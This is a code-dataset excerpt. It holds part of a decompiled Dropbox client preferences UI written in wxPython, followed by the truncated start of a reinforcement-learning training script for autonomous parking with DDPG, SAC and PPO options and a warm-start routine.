caption=pref_strings.fix_perms_really_bad_error_caption, style=wx.OK | wx.ICON_ERROR).ShowModal()\n\n @message_sender(wx.CallAfter)\n def sync_engine_is_valid(self, sync_engine):\n self.on_show()\n self.parent.resize_for_panel(type(self))\n\n @event_handler\n def on_show(self):\n assert self.url_info is not None, 'this should be set by now'\n unlink_ability = True\n if 'userdisplayname' in dropbox_globals and self.url_info.email:\n account_text_string = u'%s (%s)' % (dropbox_globals['userdisplayname'], self.url_info.email)\n elif self.url_info.email:\n account_text_string = u'%s' % self.url_info.email\n else:\n account_text_string = pref_strings.account_unlinked_display\n unlink_ability = False\n self.unlink_button.Enable(unlink_ability)\n self.unlink_button.Bind(wx.EVT_BUTTON, self.disambiguate_unlink)\n self.unlink_button.SetLabel(pref_strings.unlink_button)\n self.unlink_fix_perms = False\n unlink_button_width = self.unlink_button.GetSize().GetWidth()\n unlink_throbber_width = self.throbber.GetSize().GetWidth()\n unlink_width = unlink_button_width + unlink_throbber_width\n self.account_text.SetLabel(account_text_string)\n self.account_text.SetSize(wx.Size(100, self.account_text.GetBestSize().GetHeight()))\n self.Layout()\n self.account_text.Wrap(self.GetSize().GetWidth() - unlink_width - platform.statictext_notebook_interior * 2)\n self.Layout()\n if not self.unlink_sizer_setup:\n account_text_width = self.account_text.GetSize().GetWidth()\n unlink_border_width = self.GetSize().GetWidth() - account_text_width - unlink_width - platform.statictext_notebook_interior\n self.unlink_sizer.Add(self.unlink_button, border=unlink_border_width, flag=wx.LEFT | wx.ALIGN_CENTER_VERTICAL)\n self.unlink_sizer.Add(self.throbber, flag=wx.ALIGN_CENTER_VERTICAL)\n self.unlink_sizer.Layout()\n self.Layout()\n self.unlink_sizer_setup = True\n\n @event_handler\n def __init__(self, wx_parent, parent, dropbox_app, has_own_borders):\n super(LinuxAccountPanel, self).__init__(wx_parent, parent, dropbox_app)\n self.has_own_borders = has_own_borders\n self.url_info = self.dropbox_app.dropbox_url_info\n inner_border = wx.BoxSizer(wx.VERTICAL)\n version_label = wx.StaticText(self, label=pref_strings.version_label_plain)\n font = version_label.GetFont()\n font.SetWeight(wx.FONTWEIGHT_BOLD)\n version_label.SetFont(font)\n inner_border.Add(version_label, flag=wx.ALIGN_LEFT)\n version_text = wx.StaticText(self, label=pref_strings.buildkey_and_version % dict(version_string=VERSION))\n inner_border.Add(version_text, border=platform.statictext_notebook_interior, flag=wx.ALIGN_LEFT | wx.ALIGN_BOTTOM | wx.ALL)\n account_label = wx.StaticText(self, label=pref_strings.account_label_plain)\n font = account_label.GetFont()\n font.SetWeight(wx.FONTWEIGHT_BOLD)\n account_label.SetFont(font)\n inner_border.Add(account_label, flag=wx.ALIGN_LEFT)\n self.account_text = wx.StaticText(self, label=pref_strings.account_unlinked_display)\n self.unlink_button = wx.Button(self, label=pref_strings.unlink_button)\n self.throbber = Throbber(self)\n self.unlink_fix_perms = False\n self.unlink_sizer = wx.BoxSizer(wx.HORIZONTAL)\n self.unlink_sizer.Add(self.account_text, flag=wx.ALIGN_LEFT | wx.ALIGN_CENTER_VERTICAL)\n self.unlink_sizer.Layout()\n self.unlink_sizer_setup = False\n inner_border.Add(self.unlink_sizer, border=platform.statictext_notebook_interior, flag=wx.ALIGN_LEFT | wx.ALIGN_BOTTOM | wx.LEFT | wx.TOP | wx.BOTTOM)\n dropbox_app.ui_kit.add_sync_engine_handler(self.sync_engine_is_valid)\n if feature_enabled('multiaccount'):\n if self.dropbox_app.mbox.enabled:\n self.secondary_account_text = wx.StaticText(self, label=self.dropbox_app.config['secondary_client_email'])\n else:\n self.secondary_account_text = wx.StaticText(self, label=pref_strings.account_unlinked_display)\n self.secondary_action_sizer = wx.BoxSizer(wx.HORIZONTAL)\n self.secondary_action_sizer.Add(self.secondary_account_text, flag=wx.ALIGN_LEFT | wx.ALIGN_CENTER_VERTICAL)\n self.secondary_action_sizer.Layout()\n self.secondary_unlink_sizer_setup = False\n self.link_secondary_sizer = link_secondary_sizer = wx.BoxSizer(wx.HORIZONTAL)\n if self.dropbox_app.mbox.enabled:\n TRACE('!! secondary detected')\n secondary_unlink_label = dropbox_app.mbox.unlink_labels.secondary\n action_button = wx.Button(self, label=secondary_unlink_label)\n self.secondary_unlink_button = action_button\n self.secondary_unlink_button.Bind(wx.EVT_BUTTON, functools.partial(handle_unlink_secondary, self))\n else:\n TRACE('!! secondary not detected')\n secondary_link_label = dropbox_app.mbox.link_labels.secondary\n action_button = self.link_secondary_button = wx.Button(self, label=secondary_link_label)\n self.link_secondary_button.Bind(wx.EVT_BUTTON, functools.partial(handle_link_secondary, self))\n link_secondary_sizer.Add(action_button, border=platform.button_baseline_adjustment, flag=wx.ALIGN_BOTTOM | wx.BOTTOM)\n link_secondary_sizer.AddSpacer(wx.Size(0, 0), proportion=1, flag=wx.EXPAND)\n self.secondary_action_sizer.Add(link_secondary_sizer, flag=wx.ALIGN_RIGHT | wx.ALIGN_CENTER_VERTICAL)\n inner_border.Add(self.secondary_action_sizer)\n self.SetSizer(inner_border)\n self.Layout()\n\n\nif platform.use_notebook:\n AccountPanel = LinuxAccountPanel\nelse:\n AccountPanel = WindowsAccountPanel\n\nclass ImportPanel(DropboxTabPanel):\n\n @staticmethod\n def icon():\n return ui.images.wximages.PrefsImport.GetBitmap()\n\n @staticmethod\n def shortname():\n return pref_strings.import_tab_label\n\n @staticmethod\n def help_index():\n return 'import'\n\n @event_handler\n def read(self, state):\n if self.screenshots_selector:\n self.screenshots_selector.read(state)\n\n @event_handler\n def save(self, theEvent):\n if self.screenshots_selector:\n self.screenshots_selector.save()\n return {}\n\n @event_handler\n def on_show(self):\n self.Layout()\n self.parent.panel.Layout()\n needs_relayout = False\n if self.camera_launcher:\n self.camera_launcher.on_show()\n needs_relayout = True\n if self.photo_import_launcher:\n self.photo_import_launcher.on_show()\n needs_relayout = True\n if self.screenshots_selector and self.screenshots_selector.needs_refresh():\n self.screenshots_selector.on_show()\n needs_relayout = True\n if needs_relayout:\n self.Layout()\n self.parent.panel.Layout()\n self.screenshots_selector.enabled(bool(self.dropbox_app.screenshots_controller))\n\n @event_handler\n def __init__(self, wx_parent, parent, dropbox_app, has_own_borders):\n super(ImportPanel, self).__init__(wx_parent, parent, dropbox_app)\n self.has_own_borders = has_own_borders\n self.pref_controller = self.dropbox_app.pref_controller\n self.screenshots_selector = None\n self.camera_launcher = None\n self.photo_import_launcher = None\n self.dropbox_app = dropbox_app\n border = wx.BoxSizer(wx.VERTICAL)\n if feature_enabled('screenshots') and ScreenshotsController.is_supported(self.dropbox_app):\n try:\n self.screenshots_selector = ScreenshotsSelector(self, self.dropbox_app, self.has_own_borders, self.invalidate)\n border.Add(self.screenshots_selector, proportion=0, flag=wx.EXPAND | wx.BOTTOM, border=platform.swap_panel_border)\n except Exception:\n unhandled_exc_handler()\n\n if arch.photouploader.USE_PHOTOUPLOADER:\n try:\n self.camera_launcher = CameraUploadLauncher(self, self.dropbox_app)\n border.Add(self.camera_launcher, proportion=0, flag=wx.EXPAND | wx.BOTTOM, border=platform.swap_panel_border)\n except Exception:\n unhandled_exc_handler()\n\n importer = self.dropbox_app.stuff_importer\n if importer:\n show_pictures, show_documents = importer.show_import_button(self.dropbox_app)\n if show_pictures:\n self.photo_import_launcher = PhotoImportLauncher(self, self.dropbox_app)\n border.Add(self.photo_import_launcher, proportion=0, flag=wx.EXPAND | wx.BOTTOM, border=platform.swap_panel_border)\n self.SetSizerAndFit(border)\n self.Layout()\n\n\nclass AdvancedPanel(DropboxTabPanel):\n\n @staticmethod\n def icon():\n return ui.images.wximages.PrefsAdvanced.GetBitmap()\n\n @staticmethod\n def shortname():\n return pref_strings.advanced_tab_label\n\n @staticmethod\n def help_index():\n return 'advanced'\n\n @event_handler\n def read(self, state):\n self.langchoice.last_selection = self.codes.index(state[OPT_LANG])\n self.langchoice.SetSelection(self.langchoice.last_selection)\n\n @event_handler\n def save(self, theEvent):\n self.langchoice.last_selection = self.langchoice.GetSelection()\n return {OPT_LANG: self.codes[self.langchoice.last_selection]}\n\n @event_handler\n def on_show(self):\n self.Layout()\n self.parent.re_layout()\n\n def Layout(self):\n self.parent.panel.Layout()\n self.selsync_launcher.on_show()\n if self.secondary_selsync_launcher:\n self.secondary_selsync_launcher.on_show()\n super(AdvancedPanel, self).Layout()\n\n @event_handler\n def handle_langchoice(self, theEvent):\n selection = self.langchoice.GetSelection()\n code = self.codes[selection]\n\n def prompt_cb(message, caption = None, on_ok = None, on_cancel = None, ok_button = None, cancel_button = None):\n assert on_ok\n style = wx.OK | wx.CANCEL if on_cancel else wx.OK\n if wx.MessageDialog(self, message, caption, style).ShowModal() == wx.ID_OK:\n on_ok()\n elif on_cancel:\n on_cancel()\n\n def on_restart():\n self.parent.save(theEvent, skip_errors=True)\n\n def on_done():\n self.langchoice.last_selection = selection\n self.langchoice.SetFocus()\n self.invalidate(theEvent, False)\n\n def on_cancel():\n self.langchoice.SetSelection(self.langchoice.last_selection)\n self.langchoice.SetFocus()\n self.invalidate(theEvent, False)\n\n change_client_language(self.dropbox_app, code, prompt_cb, on_done, on_cancel, on_restart)\n\n def add_location_changer(self, secondary = False):\n if self.dropbox_app.mbox.enabled:\n labels = self.dropbox_app.mbox.location_changer_labels\n label = labels.secondary if secondary else labels.primary\n else:\n label = pref_strings.loc_changer_label\n if not self.has_own_borders:\n l_label = wx.StaticText(self, label=label)\n l_font = l_label.GetFont()\n l_font.SetWeight(wx.FONTWEIGHT_BOLD)\n l_label.SetFont(l_font)\n self.border.Add(l_label, flag=wx.EXPAND | wx.BOTTOM)\n self.border.AddSpacer(wx.Size(0, platform.textctrl_textctrl_vertical_spacing))\n location_changer = DropboxLocationChanger(self, self.dropbox_app, move=True, has_own_borders=self.has_own_borders, transparent_hack=False, secondary=secondary, label=label)\n self.border.Add(location_changer, proportion=0, flag=wx.EXPAND | wx.BOTTOM, border=platform.swap_panel_border)\n self.border.AddSpacer(wx.Size(0, platform.textctrl_textctrl_vertical_spacing))\n return location_changer\n\n def add_selective_sync_launcher(self, secondary = False):\n if self.dropbox_app.mbox.enabled:\n labels = self.dropbox_app.mbox.selective_sync_labels\n label = labels.secondary if secondary else labels.primary\n else:\n label = selsync_strings.prefs_group_label\n if not self.has_own_borders:\n l_label = wx.StaticText(self, label=label)\n l_font = l_label.GetFont()\n l_font.SetWeight(wx.FONTWEIGHT_BOLD)\n l_label.SetFont(l_font)\n self.border.Add(l_label, flag=wx.EXPAND | wx.BOTTOM)\n selsync_launcher = SelectiveSyncLauncher(self, self.dropbox_app, has_own_borders=self.has_own_borders, transparent_hack=False, secondary=secondary, label=label)\n self.border.Add(selsync_launcher, proportion=0, flag=wx.EXPAND | wx.BOTTOM, border=platform.swap_panel_border)\n self.border.AddSpacer(wx.Size(0, platform.textctrl_textctrl_vertical_spacing))\n return selsync_launcher\n\n @assert_message_queue\n def reset(self):\n if self.border:\n self.border.Clear(True)\n border = self.border = wx.BoxSizer(wx.VERTICAL)\n self.location_changer = self.add_location_changer(secondary=False)\n if self.dropbox_app.mbox.enabled:\n self.secondary_location_changer = self.add_location_changer(secondary=True)\n else:\n self.secondary_location_changer = None\n self.selsync_launcher = self.add_selective_sync_launcher(secondary=False)\n if self.dropbox_app.mbox.enabled:\n self.secondary_selsync_launcher = self.add_selective_sync_launcher(secondary=True)\n else:\n self.secondary_selsync_launcher = None\n self.dropbox_app.ui_kit.add_post_link_handler(self.post_link_handler)\n self.codes = []\n choices = []\n for code, translated, english in dropbox.i18n.get_available_languages():\n self.codes.append(code)\n choices.append('%s [%s]' % (translated, english))\n\n self.langchoice = wx.Choice(self, -1, choices=choices)\n self.langchoice.Bind(wx.EVT_CHOICE, self.handle_langchoice)\n if self.has_own_borders:\n self.l_box = wx.StaticBox(self, label=pref_strings.language_label)\n choice_vsizer = wx.StaticBoxSizer(self.l_box, wx.VERTICAL)\n choice_hsizer = wx.BoxSizer(wx.HORIZONTAL)\n choice_hsizer.Add(self.langchoice, proportion=1, flag=wx.EXPAND)\n choice_vsizer.Add(choice_hsizer, proportion=0, flag=wx.EXPAND | wx.ALL, border=platform.radio_static_box_interior)\n else:\n choice_vsizer = wx.BoxSizer(wx.HORIZONTAL)\n lang_text = wx.StaticText(self, label=pref_strings.language_colon)\n choice_vsizer.Add(lang_text, flag=wx.ALIGN_CENTER_VERTICAL)\n choice_vsizer.AddSpacer(wx.Size(platform.statictext_textctrl_horizontal_spacing, 0), proportion=0, flag=wx.EXPAND)\n choice_vsizer.Add(self.langchoice, flag=wx.ALIGN_CENTER_VERTICAL)\n border.Add(choice_vsizer, proportion=0, flag=wx.EXPAND | wx.BOTTOM, border=platform.swap_panel_border)\n url_map = {'url': self.dropbox_app.dropbox_url_info.help_url('open_source_software')}\n label = pref_strings.open_source_label % url_map\n open_source_note = StaticLinkText(self, label)\n open_source_note.SetBackgroundColour(self.parent.panel.GetBackgroundColour())\n border.AddSpacer(wx.Size(0, platform.textctrl_textctrl_vertical_spacing))\n border.Add(open_source_note, flag=wx.ALIGN_CENTER_VERTICAL)\n border.AddSpacer(wx.Size(0, platform.textctrl_textctrl_vertical_spacing))\n self.SetSizer(border)\n self.Layout()\n\n @assert_message_queue\n def __init__(self, wx_parent, parent, dropbox_app, has_own_borders):\n super(AdvancedPanel, self).__init__(wx_parent, parent, dropbox_app)\n self.dropbox_app = dropbox_app\n self.has_own_borders = has_own_borders\n self.border = None\n self.reset()\n\n @assert_message_queue\n def on_secondary_link(self, linked):\n self.reset()\n\n @message_sender(wx.CallAfter)\n def post_link_handler(self):\n self.selsync_launcher.Enable(True)\n self.location_changer.Enable(True)\n if self.secondary_selsync_launcher:\n self.secondary_selsync_launcher.Enable(True)\n if self.secondary_location_changer:\n self.secondary_location_changer.Enable(True)\n\n\nclass MainPanel(DropboxTabPanel):\n QUIT_LABEL_WIDTH = 150\n\n @staticmethod\n def icon():\n return ui.images.wximages.PrefsMain.GetBitmap()\n\n @staticmethod\n def shortname():\n return pref_strings.main_tab_label\n\n @staticmethod\n def help_index():\n return 'general'\n\n @event_handler\n def read(self, state):\n if arch.startup.can_configure_startupitem:\n self.startbox.SetValue(state[OPT_STARTUP])\n self.notifybox.SetValue(state[OPT_BUBBLES])\n self.lanbox.SetValue(state[OPT_P2P])\n\n @event_handler\n def save(self, theEvent):\n state = {}\n if arch.startup.can_configure_startupitem:\n state[OPT_STARTUP] = self.startbox.GetValue()\n state[OPT_BUBBLES] = self.notifybox.GetValue()\n state[OPT_P2P] = self.lanbox.GetValue()\n return state\n\n @event_handler\n def on_show(self):\n self.startbox.Show(arch.startup.can_configure_startupitem)\n self.Layout()\n self.parent.panel.Layout()\n\n @event_handler\n def __init__(self, wx_parent, parent, dropbox_app, has_own_borders):\n super(MainPanel, self).__init__(wx_parent, parent, dropbox_app)\n self.has_own_borders = has_own_borders\n self.pref_controller = self.dropbox_app.pref_controller\n self.camera_launcher = None\n border = wx.BoxSizer(wx.VERTICAL)\n if self.has_own_borders:\n i_box = wx.StaticBox(self)\n i_sizer = wx.StaticBoxSizer(i_box, wx.VERTICAL)\n else:\n i_sizer = wx.BoxSizer(wx.VERTICAL)\n notifysizer = wx.BoxSizer(wx.HORIZONTAL)\n self.notifybox = wx.CheckBox(self, label=pref_strings.show_bubbles)\n self.notifybox.Bind(wx.EVT_CHECKBOX, self.invalidate)\n notifysizer.Add(self.notifybox, border=platform.radio_static_box_interior, flag=wx.LEFT | wx.RIGHT | wx.TOP)\n notifysizer.AddSpacer(wx.Size(0, 0), proportion=1, flag=wx.EXPAND)\n i_sizer.Add(notifysizer, proportion=0, flag=wx.EXPAND)\n i_sizer.AddSpacer(wx.Size(0, platform.checkbox_group_spacer))\n startsizer = wx.BoxSizer(wx.HORIZONTAL)\n self.startbox = wx.CheckBox(self, label=pref_strings.startup_item)\n self.startbox.Bind(wx.EVT_CHECKBOX, self.invalidate)\n startsizer.Add(self.startbox, border=platform.radio_static_box_interior, flag=wx.LEFT | wx.RIGHT)\n startsizer.AddSpacer(wx.Size(0, 0), proportion=1, flag=wx.EXPAND)\n i_sizer.Add(startsizer, proportion=0, flag=wx.EXPAND)\n i_sizer.AddSpacer(wx.Size(0, platform.checkbox_group_spacer))\n lansizer = wx.BoxSizer(wx.HORIZONTAL)\n self.lanbox = wx.CheckBox(self, label=pref_strings.p2p_enabled)\n self.lanbox.Bind(wx.EVT_CHECKBOX, self.invalidate)\n lansizer.Add(self.lanbox, border=platform.checkbox_baseline_adjustment, flag=wx.ALIGN_BOTTOM | wx.BOTTOM)\n lansizer.AddSpacer(wx.Size(platform.radio_static_box_interior, 0), proportion=0, flag=wx.EXPAND)\n i_sizer.Add(lansizer, border=platform.radio_static_box_interior, proportion=0, flag=wx.EXPAND | wx.LEFT | wx.RIGHT | wx.BOTTOM)\n border.Add(i_sizer, flag=wx.EXPAND | wx.BOTTOM, border=platform.swap_panel_border)\n self.SetSizerAndFit(border)\n self.Layout()\n\n\nclass PrefsFrame(DropboxTabbedFrame):\n PANELS = [MainPanel,\n AccountPanel,\n ImportPanel,\n BandwidthSettingsPanel,\n ProxySettingsPanel,\n AdvancedPanel]\n PANEL_NAME_TO_TYPE = {PanelNames.GENERAL: MainPanel,\n PanelNames.ACCOUNT: AccountPanel,\n PanelNames.IMPORT: ImportPanel,\n PanelNames.ADVANCED: AdvancedPanel}\n DEFAULT_PANEL = PANELS[0]\n first_show = True\n\n @message_sender(wx.CallAfter, block=True)\n def __init__(self, parent, dropbox_app, *n, **kw):\n kw['atable_extensions'] = [(wx.ACCEL_NORMAL, wx.WXK_CONTROL, self.on_ctrldown)]\n super(PrefsFrame, self).__init__(parent, dropbox_app, *n, **kw)\n self.pref_controller = dropbox_app.pref_controller\n dropbox_app.mbox.on_secondary_link.add_handler(self.on_secondary_link)\n\n @event_handler\n def switch_help_url(self):\n if self.help_link is not None:\n if WINDOWS_VERSION >= VISTA:\n the_os = 'vista'\n else:\n the_os = 'xp'\n new_url = self.dropbox_app.dropbox_url_info.help_url('prefs/%s/%s' % (the_os, self.current_panel_t.help_index()))\n self.help_link.SetLabel(u'%s' % (new_url, pref_strings.help_label))\n\n def setup(self, kw):\n kw['title'] = pref_strings.dropbox_prefs\n return kw\n\n @message_sender(wx.CallAfter)\n def on_secondary_link(self, linked):\n if linked is True or linked is False:\n for panel in self.all_panels.itervalues():\n panel.on_secondary_link(linked)\n\n self.update_biggest_dimensions()\n self.update_resize_sizer()\n self.re_layout()\n\n @event_handler\n def save(self, theEvent, skip_errors = False):\n state_update = {}\n for panel in itertools.chain((self.all_panels[panel_t] for panel_t in self.all_panels if panel_t == self.current_panel_t), (self.all_panels[panel_t] for panel_t in self.all_panels if panel_t != self.current_panel_t)):\n try:\n state_update.update(panel.save(theEvent))\n except InvalidEntryException as e:\n unhandled_exc_handler(False)\n if not skip_errors:\n self.panel_swapper_factory(e.args[0])(None)\n self.all_panels[e.args[0]].on_show()\n wx.MessageDialog(self, e.args[1], caption='', style=wx.OK | wx.ICON_EXCLAMATION).ShowModal()\n raise\n except Exception:\n unhandled_exc_handler()\n\n else:\n self.pref_controller.update(state_update)\n self.invalidate(theEvent, False)\n\n @event_handler\n def help(self, theEvent):\n the_url = self.dropbox_app.dropbox_url_info.help_url('prefs/linux/%s' % self.current_panel_t.help_index())\n self.dropbox_app.dropbox_url_info.launch_full_url(the_url)\n\n def post_init(self):\n pass\n\n @message_sender(wx.CallAfter)\n def read(self, pref_state):\n for panel in self.all_panels.values():\n panel.read(pref_state)\n\n self.invalidate(None, False)\n\n @event_handler\n def close(self, theEvent):\n TRACE('Closing prefs pane')\n if not hasattr(self.all_panels[self.DEFAULT_PANEL], 'location_changer') or self.all_panels[self.DEFAULT_PANEL].location_changer.not_moving.isSet():\n self.hide_user()\n\n @event_handler\n def on_ctrldown(self, *n):\n try:\n self.all_panels[AccountPanel].on_ctrldown(*n)\n except AttributeError:\n pass\n","repo_name":"bizonix/DropBoxLibrarySRC","sub_path":"pyc_decrypted/latest/ui/wxpython/preferences.py","file_name":"preferences.py","file_ext":"py","file_size_in_byte":51851,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"2633471694","text":"import math\nimport sys\nfrom typing import Dict, List\nimport os\nimport json\n\nimport numpy as np\nimport gym\n\nimport torch\nimport random\n\nimport argparse\n\nfrom torch.utils.tensorboard import SummaryWriter\n\nimport platform\nimport sys\nsys_platform = platform.platform().lower()\nif \"windows\" in sys_platform:\n sys.path.append('D://project-ant/TPCAP/IEEE/Autonomous-Parking-Narrow-Space/')\nelif \"linux-4.15.0\" in sys_platform:\n sys.path.append('/mnt/disk_ant/yuanzheng/Autonomous-Parking-Narrow-Space/')\nelif \"linux-5.4.0\" in sys_platform:\n sys.path.append('//root/autodl-tmp/ant/Autonomous-Parking-Narrow-Space/')\n\nfrom rl.environment.env import Environment\nfrom rl.algorithms.PDDPG import Agent\nfrom rl.algorithms.PDDPG_C import Agent as PCAgent\nfrom rl.algorithms.PDDPG_C_IB import Agent as IBDDPGAgent\nfrom rl.algorithms.SAC import Agent as SACAgent\nfrom rl.algorithms.PPO import Agent as PPOAgent\nfrom rl.algorithms.IBAC_PPO import Agent as IBPPOAgent\nfrom rl.algorithms.augmentations import her_augmentation\nfrom rl.sparse_rewards.prioritized.test import test\nfrom rl.utils.savePath import show, saveCsv\nfrom rl.utils.dealData import *\nfrom Vehicle import OBCAPath, Vehicle, Path\nfrom pyobca.search import VehicleConfig\nfrom quadraticOBCA import quadraticPath\n\nfrom case import Case\n\n\n# fix random seed\ndef same_seeds(seed):\n print(\"===========Set the random seed: {}================\".format(seed))\n torch.manual_seed(seed) # 固定随机种子(CPU)\n if torch.cuda.is_available(): # 固定随机种子(GPU)\n torch.cuda.manual_seed(seed) # 为当前GPU设置\n torch.cuda.manual_seed_all(seed) # 为所有GPU设置\n np.random.seed(seed) # 保证后续使用random函数时,产生固定的随机数\n torch.backends.cudnn.benchmark = True # GPU、网络结构固定,可设置为True\n torch.backends.cudnn.deterministic = True # 固定网络结构\n\n\nsame_seeds(42)\n\n\ndef get_args():\n args = argparse.ArgumentParser(\"The args of TPCAP RL\")\n args.add_argument('--alg', type=str, default=\"DDPG\", help=\"The algorithm of model\")\n args.add_argument('--random_choice', action=\"store_true\", default=False, help=\"If random choice the path num?\")\n args.add_argument('--exp_name', default=\"test\", type=str, help=\"The name of exp\")\n args.add_argument('--maxT', type=int, default=40, help=\"The total time of simulation.\")\n args.add_argument('--dis_factor', type=int, default=5, help=\"The factor of dis loss\")\n args.add_argument('--delta_factor', type=int, default=10, help=\"The factor of delta loss\")\n args.add_argument('--obs_factor', type=float, default=10, help=\"The factor of obstacle avoidance\")\n args.add_argument('--her', action=\"store_true\", default=False, help=\"If use the her to augment data\")\n args.add_argument('--evaluate_loop', type=int, default=20, help=\"The frequency of evaluate\")\n args.add_argument('--case', type=int, default=7, help=\"The special case for training\")\n args.add_argument('--warm_start', action=\"store_true\", default=False, help=\"Generate the warm data to train\")\n args.add_argument('--action_c', action=\"store_true\", default=False, help=\"If use the continues action?\")\n args.add_argument('--large_interval', action=\"store_true\", default=False, help=\"Use the large control interval\")\n args.add_argument('--reward_back', action=\"store_true\", default=False, help=\"If use the reward back when using warm start\")\n args.add_argument('--cuda', action=\"store_true\", help='run on CUDA (default: False)')\n args.add_argument('--relative', action=\"store_true\", help=\"Use the relatively goal position\")\n args.add_argument('--obca', action=\"store_true\", default=False, help=\"Use the obca to deal data after test\")\n\n\n # ===================== DDPG Bottleneck===========================\n args.add_argument('--ddpg_hidden', type=int, default=256, help=\"The hidden dim of DDPG IB\")\n args.add_argument('--ddpg_std_init', type=float, default=0.3, metavar='G',\n help='action std init (default: 0.6)')\n\n # =====================Soft Actor Critic =========================\n args.add_argument('--sac_policy', default=\"Gaussian\",\n help='Policy Type: Gaussian | Deterministic (default: Gaussian)')\n args.add_argument('--sac_gamma', type=float, default=0.99, metavar='G',\n help='discount factor for reward (default: 0.99)')\n args.add_argument('--sac_tau', type=float, default=0.005, metavar='G',\n help='target smoothing coefficient(τ) (default: 0.005)')\n args.add_argument('--sac_lr', type=float, default=0.0003, metavar='G',\n help='learning rate (default: 0.0003)')\n args.add_argument('--sac_alpha', type=float, default=0.2, metavar='G',\n help='Temperature parameter α determines the relative importance of the entropy\\\n term against the reward (default: 0.2)')\n args.add_argument('--sac_batch_size', type=int, default=256, metavar='N',\n help='batch size (default: 256)')\n args.add_argument('--sac_automatic_entropy_tuning', type=bool, default=False, metavar='G',\n help='Automaically adjust α (default: False)')\n args.add_argument('--sac_target_update_interval', type=int, default=1, metavar='N',\n help='Value target update per no. of updates per step (default: 1)')\n args.add_argument('--sac_hidden_size', type=int, default=256, metavar='N', help='hidden size (default: 256)')\n\n # ====================== PPO =================================\n args.add_argument('--ppo_gamma', type=float, default=0.99, metavar='G',\n help='discount factor for reward ppo')\n args.add_argument('--ppo_lr_actor', type=float, default=0.0003, metavar='G',\n help='learning rate of ppo actor')\n args.add_argument('--ppo_lr_critic', type=float, default=0.001, metavar='G',\n help='learning rate of ppo actor')\n args.add_argument('--ppo_adam_eps', type=float, default=1e-5, metavar='G',\n help='the adam eps of ppo')\n args.add_argument('--ppo_k_epochs', type=int, default=80, metavar='N',\n help='update policy for k epochs in one ppo update')\n args.add_argument('--ppo_eps_clip', type=float, default=0.2, metavar='G',\n help='clip parameter for ppo')\n args.add_argument('--ppo_hidden_size', type=int, default=256, metavar='N',\n help='hidden size (default: 256)')\n args.add_argument('--ppo_std_init', type=float, default=0.6, metavar='G',\n help='action std init (default: 0.6)')\n args.add_argument('--ppo_batch_size', type=int, default=256, metavar='N',\n help='batch size (default: 256)')\n args.add_argument('--ppo_update_timestep', type=int, default=800, metavar='N',\n help='update timestep of ppo = max_len * 4')\n args.add_argument('--ppo_std_decay_rate', type=float, default=0.05, metavar='G',\n help='linearly decay action_std (action_std = action_std - action_std_decay_rate)')\n args.add_argument('--ppo_min_action_std', type=float, default=0.00, metavar='G',\n help='minimum action_std (stop decay after action_std <= min_action_std)')\n args.add_argument('--ppo_std_decay_freq', type=int, default=10000,\n help='action_std decay frequency (in num timesteps)')\n\n # ====================== IBAC PPO =============================\n args.add_argument('--ibppo_lr', type=float, default=0.0001,\n help=\"the learning rate for optimizers.\")\n args.add_argument('--ibppo_gae_lambda', type=float, default=0.95,\n help=\"the factor of gae lambda.\")\n args.add_argument('--ibppo_entropy_coef', type=float, default=0.01,\n help=\"the factor of entropy coef.\")\n args.add_argument('--ibppo_value_loss_coef', type=float, default=0.5,\n help=\"the factor of value loss coef.\")\n args.add_argument('--ibppo_max_grad_norm', type=float, default=0.5,\n help=\"the factor of max grad norm.\")\n args.add_argument('--ibppo_beta', type=float, default=1.0,\n help=\"the factor of beta.\")\n args.add_argument('--ibppo_sni_type', type=str, default=\"vib\",\n help=\"the type of sni.\")\n args.add_argument('--ibppo_use_bottleneck', action=\"store_true\", default=False,\n help=\"use the bottleneck.\")\n args.add_argument('--ibppo_use_l2a', action=\"store_true\", default=False,\n help=\"use the l2a.\")\n args.add_argument('--ibppo_use_bn', action=\"store_true\", default=False,\n help=\"use the batch norm.\")\n args.add_argument('--ibppo_use_dropout', action=\"store_true\", default=False,\n help=\"use the dropout.\")\n args.add_argument('--ibppo_use_l2w', action=\"store_true\", default=False,\n help=\"use the l2 loss of weight.\")\n args.add_argument('--res_net', action=\"store_true\", default=False,\n help=\"use the res net framework to actor\")\n\n return args.parse_args()\n\n\ndef warm_start(args, agent, tb=None, path_num=7, env=None, saveFigPath=None):\n print(\"================== Warm Start ====================\")\n inputfiledir = \"../../../Result/case-{}\".format(args.case)\n for j in range(4):\n inputfile = os.path.join(inputfiledir, \"data_{}\".format(j))\n path_t = np.load(os.path.join(inputfile, \"array_t.npy\"))\n path_x = np.load(os.path.join(inputfile, \"array_x.npy\"))\n path_y = np.load(os.path.join(inputfile, \"array_y.npy\"))\n path_v = np.load(os.path.join(inputfile, \"array_v.npy\"))\n path_a = np.load(os.path.join(inputfile, \"array_a.npy\"))\n path_yaw = np.load(os.path.join(inputfile, \"array_yaw.npy\"))\n path_steer = np.load(os.path.join(inputfile, \"array_steer.npy\"))\n path_steer_rate = np.load(os.path.join(inputfile, \"array_steer_rate.npy\"))\n new_path_t, new_path_x, new_path_y, new_path_v, new_path_a, new_path_yaw, new_path_steer, new_path_steer_rate = \\\n interpData(path_t, path_x, path_y, path_v, path_a, path_yaw, path_steer, path_steer_rate)\n # 反向计算,后面的奖励可以影响前面的奖励\n rewards = [0] * (len(new_path_t) - 1)\n for i in range(len(new_path_t)-1, 0, -1):\n state = generateObs(new_path_x[i], new_path_y[i], new_path_yaw[i], new_path_v[i], new_path_steer[i], agent.env, args)\n pre_state = generateObs(new_path_x[i-1], new_path_y[i-1], new_path_yaw[i-1], new_path_v[i-1],\n new_path_steer[i-1], agent.env, args)\n real_state = generateRealObs(new_path_x[i], new_path_y[i], new_path_yaw[i], new_path_v[i], new_path_steer[i],\n agent.env)\n real_pre_state = generateRealObs(new_path_x[i - 1], new_path_y[i - 1], new_path_yaw[i - 1], new_path_v[i - 1],\n new_path_steer[i - 1], agent.env)\n action = np.array([new_path_a[i-1]/agent.env.a_max, new_path_steer_rate[i-1]/agent.env.omega_max])\n reward, done = agent.env.cal_reward_from_state(real_state, real_pre_state)\n\n if i < len(new_path_t) - 1:\n if args.reward_back:\n reward = 0.8 * reward + 0.2 * rewards[i] # 后续奖励叠加\n else:\n reward = reward\n\n rewards[i-1] = reward\n\n agent.memory.add(pre_state, action, reward, state, done)\n\n for warm_train in range(1000):\n agent.optimize(tb)\n test_score, path = test(agent=agent, path_num=path_num, env=env, args=args)\n show(path, env.case, path_num, 